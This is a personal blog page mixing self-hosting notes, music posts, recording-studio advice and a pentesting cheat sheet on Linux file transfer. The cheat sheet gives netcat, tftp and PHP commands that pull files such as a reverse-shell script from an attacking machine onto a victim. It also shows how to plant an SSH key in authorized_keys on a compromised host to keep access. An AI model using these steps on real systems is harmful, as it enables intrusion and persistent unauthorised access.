Skip to content

Will Chatham Posts

Self Hosting – Cloudron

I have been using Cloudron recently, and after initially trying it out a couple years ago, I found it to be a really easy, awesome way to create my own, personal, cloud, keeping the peering eyes of big-tech out of my life.

So far I have been using Cloudron to manage my OnlyOffice office instance (better than MS Office or Google Docs) and my instance of Nextcloud, a Google Drive-like file storage and sharing center. They integrate with each other to create your own, secure, private office suite with file storage.

The best part is that you can do all this simply from the DigitalOcean Marketplace – a one-click shop for easy installation of everything. All you need is a domain name to point at it.

Once you have it installed, you can set it and forget it, as Cloudron will keep itself updated, patched, and secure.

Cloudron Coupon Code

It isn’t cheap to run Cloudron, but it lets you host 2 app without a subscriotion. I have yet to find a working Cloudron coupon code out there, but there are Cloudron referral codes such as my own (https://cloudron.io/?refcode=901142a319d1498b) which earn the referee a small discount. Once you have your own Cloudron account set up, you can use your own referral code and encourage others to use.

So that is me encouraging you to use my referrer code 😀

New Music

I have been cranking away at some new songs. I just released two over the last week. I hope you enjoy them. Please comment, subscribe, yada yada.

For the Sake of Everything

Rahu, Rahu

And, of course, you can hear the full album I released back in June:

If you’d like a copy of that album on CD, just shoot me your name and address. It is free, and I will cover the shipping cost!

Will Chatham’s Musical Variety Show is out!

My new solo album is out (unofficially)! It has been “soft launched” at willchathammusic.com and you can stream the whole thing from there, or buy it to download and listen to as you wish.

The album features some musical mastery from friend and former bandmate Morgan Geer (bass on Donald Trump Eats Babies), as well as the vocal talents of current bandmate David Earl Tomlinson (vocals on Hello My Friend).

Additionally, my two teens, Gray Chatham and Dax Chatham, contributed trumpet and sax parts on several songs. Needless to say, I am stoked at how all this came together.

The CDs and officially release to all the usual streaming services will be happening soon, but for now, here is the album. I hope you find something on it you like – it is a, well, variety of genres!

Linux File Transfer Techniques

Digging through my pentesting notes from over the last few years, I pulled together various scrawled things on quick ways to transfer files from one place to another. Thought I’d share the reference here in case anyone finds it useful.

Note: Some of this may have been copy/pasted from various places — I don’t honestly remember. If you recognize something, let me know – I am happy to give credit where credit is due!

Simple Python HTTP Server

This is an easy way to set up a web-server. This command will make the entire folder, from where you issue the command, available on port 9999.

python -m SimpleHTTPServer 9999

Wget

You can download files from that running Pything server using wget like this:

wget 192.168.1.102:9999/file.txt

Curl

curl -O <http://192.168.0.101/file.txt>

Netcat

Another easy way to transfer files is by using netcat.

If you can’t have an interactive shell it might be risky to start listening on a port, since it could be that the attacking-machine is unable to connect. So you are left hanging and can’t do ctr-c because that will kill your session.

So instead you can connect from the target machine like this.

On attacking machine:

nc -lvp 4444 < file

On target machine:

nc 192.168.1.102 4444 > file

You can of course also do it the risky way, the other way around:

So on the victim-machine we run nc like this:

nc -lvp 3333 > enum.sh

And on the attacking machine we send the file like this:

nc 192.168.1.103 < enum.sh

I have sometimes received this error:

This is nc from the netcat-openbsd package. An alternative nc is available

I have just run this command instead:

nc -l 1234 > file.sh

Socat

Server receiving file:

server$ socat -u TCP-LISTEN:9876,reuseaddr OPEN:out.txt,creat && cat out.txt
client$ socat -u FILE:test.txt TCP:127.0.0.1:9876

Server sending file:

server$ socat -u FILE:test.dat TCP-LISTEN:9876,reuseaddr
client$ socat -u TCP:127.0.0.1:9876 OPEN:out.dat,creat

With php

echo "<?php file_put_contents('nameOfFile', fopen('<http://192.168.1.102/file>', 'r')); ?>" > down2.php

Ftp

If you have access to a ftp-client to can of course just use that. Remember, if you are uploading binaries you must use binary mode, otherwise the binary will become corrupted!!!

Tftp

On some rare machine we do not have access to nc and wget, or curl. But we might have access to tftp. Some versions of tftp are run interactively, like this:

$ tftp 192.168.0.101
tftp> get myfile.txt

If we can’t run it interactively, for whatever reason, we can do this trick:

tftp 191.168.0.101 <<< "get shell5555.php shell5555.php"

SSH – SCP

If you manage to upload a reverse-shell and get access to the machine you might be able to enter using ssh. Which might give you a better shell and more stability, and all the other features of SSH. Like transferring files.

So, in the /home/user directory you can find the hidden .ssh files by typing ls -la.Then you need to do two things.

Create a new keypair

You do that with:

ssh-keygen -t rsa -C "your_email@example.com"

then you enter a name for the key.

Enter file in which to save the key (/root/.ssh/id_rsa): nameOfMyKeyEnter passphrase (empty for no passphrase):Enter same passphrase again:

This will create two files, one called nameOfMyKey and another called nameOfMyKey_pub. The one with the _pub is of course your public key. And the other key is your private.

Add your public key to authorized_keys

Now you copy the content of nameOfMyKey_pub.On the compromised machine you go to ~/.ssh and then run add the public key to the file authorized_keys. Like this

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQqlhJKYtL/r9655iwp5TiUM9Khp2DJtsJVW3t5qU765wR5Ni+ALEZYwqxHPNYS/kZ4Vdv..." > authorized_keys

Log in

Now you should be all set to log in using your private key. Like this

ssh -i nameOfMyKey kim@192.168.1.103

SCP

Now we can copy files to a machine using scp

# Copy a file:
scp /path/to/source/file.ext username@192.168.1.101:/path/to/destination/file.ext

# Copy a directory:
scp -r /path/to/source/dir username@192.168.1.101:/path/to/destination

What to Expect on Your First Time in a Recording Studio

Are you a musician who has made that all-important step forward and booked yourself time in a recording studio for your first ever session? It’s a huge step, and one to feel proud and excited about, but at the same time, you want to be sure you make the most of the opportunity and show up prepared and ready to work, and be creative.

To help you better understand what your experience will be like in a recording studio, allowing you to plan appropriately, let’s break down exactly how things work.

Be Clear on What the Booking Entails

Before making any sort of booking at a recording studio, it’s important to determine what exactly a booking includes. Will you have self-service access to equipment? What is the quality of the equipment? Do you have to pay a premium to use the equipment? What is the length of time of your booking? What about a space for production, writing, and editing? Is there a vocal booth? These are just some of the things you’ll want to investigate before you make any sort of booking. It ensures that you’re getting what you need, and that you’re getting your money’s worth. It also helps you to narrow down the options and pick the ideal recording studio for you.

For many artists, the best recording studio is the one you can write and produce music in, and take advantage of day rates. These are all the features that Pirate Studio in Brooklyn offers musicians, giving them the tools and the flexibility that they need to make music happen and feed their art. These Brooklyn recording studios are well-known in the industry and have a very strong and respected reputation.

Chat with Your Producer/Engineer in Advance and Have a Plan

Because time is of the essence, you’ll want to head into the experience expecting to get to work the moment you step foot in the studio. Artists are recommended to speak with their producer/engineer in advance and have a plan on what to accomplish in the session.
For musicians, the idea of having a schedule or a plan can seem a bit stifling and doesn’t allow for that natural organic flow, but here’s the thing – you’re on the clock, so forming those creative thoughts and visions in advance can definitely help the session to be more successful.

Make Sure Your Gear is In Good Condition and Ready to Be Used

Because you want to get started right away, it’s also wise to tune up your gear ahead of time and make sure everything is working properly. You could even do a little practice run before you head out to the recording studio, thereby eliminating the need to do so when you arrive.
If you require a lot of gear, make sure you take the time to go over everything you have packed, making sure nothing has been forgotten. Making a list of items you want to take with you can help to alleviate some of the stress. It ensures nothing gets forgotten in the rush of the moment.

Keep the Head Count to a Minimum

While it may be tempting to bring along all kinds of friends to help you out, the fact is that you don’t want the studio to be too crowded and to get too hectic. Try to keep the bodies to a minimum and just bring the people you need to help you make your music. If a person doesn’t add to the process and have a job to do, then they probably aren’t needed in the studio.
The last thing you want is to be distracted while you’re in the recording studio trying to accomplish your music goals.

Don’t Be Afraid to Step Outside the Box

Once you are in the studio and you see all the equipment before you, don’t be afraid to experiment. You can step outside your box, try a different set-up, make small adjustments, and just allow yourself to be creative in the moment. So, while it’s good to have a plan, that plan doesn’t have to be written in stone and there still needs to be room for creative freedom.

Be Sure to Pack Snacks and Beverages

The final tip is a really simple one, but it’s also important. Be sure to also pack some snacks and beverages. You could be in that studio all day so your vocal health and energy level needs to be something you are mindful of.

One of the Best Experiences of Your Life

As a musician, there is nothing quite like the first time you step foot into a recording studio. It’s an impressive milestone, and one that you don’t want to take lightly. Go ahead and celebrate, pat yourself on the back, and then get down to business and make the absolute most of your time in the studio.

A new song – Reno Ride

Here’s one I learned by starting with Jason Skinner videos on YouTube, but also by listening to the original from Don Reno over and over. I’ll never play it as well as he did, but at least I got to play on his banjo once.

Let me know what you think!